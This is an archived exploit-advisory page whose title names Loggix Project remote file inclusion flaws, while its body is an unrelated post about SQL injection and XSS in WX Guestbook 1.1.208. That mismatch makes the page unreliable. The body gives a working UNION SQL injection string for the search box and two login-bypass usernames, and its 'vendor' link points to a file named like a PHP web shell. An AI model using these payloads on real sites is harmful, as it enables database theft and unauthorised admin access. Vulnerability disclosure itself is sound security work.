TUCoPS :: HP Unsorted L :: bu-1249.htm

Loggix Project <= 9.4.5 Multiple Remote File Inclusion Vulnerabilities
Loggix Project <= 9.4.5 Multiple Remote File Inclusion Vulnerabilities
Loggix Project <= 9.4.5 Multiple Remote File Inclusion Vulnerabilities


###########################################=0D
#	WX Guest Book 1.1.208 Vulns	  #=0D
#	By xxHackerXzX hacker from nepal	  #=0D
#	admin@ekin0x.comm	 #=0D 
###########################################=0D
=0D
Product name: WX Guestbook 1.1.208=0D
Product vendor: http://www.ekin0x.com/r57.txt=0D 
=0D
This product suffers from multiple SQLi and persistent XSS vuln.=0D
=0D
##############  SQL Search Vuln  ###############=0D
=0D
The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server.=0D
=0D
SQL query:=0D
$signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC");=0D
=0D
The $QUERY is what we submit through search box so injecting this will sql inject the server.=0D
The following is the sample sql injection example.=0D
=0D
=0D
Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*=0D
=0D
##############  SQL login bypass  ###############=0D
The username and password fields are unsanitized and hence we can bypass the login systems.=0D
=0D
Username: admin'))/*=0D
Password: learn3r  [or whatever]=0D
=0D
Or=0D
=0D
Username: ')) or 1=1/*=0D
Password: learn3r  [or whatever]=0D
=0D
##############  Persistent XSS Vulns  ##############=0D
=0D
In the name field (I suppose as I don't understand arabic), you can inject XSS...=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH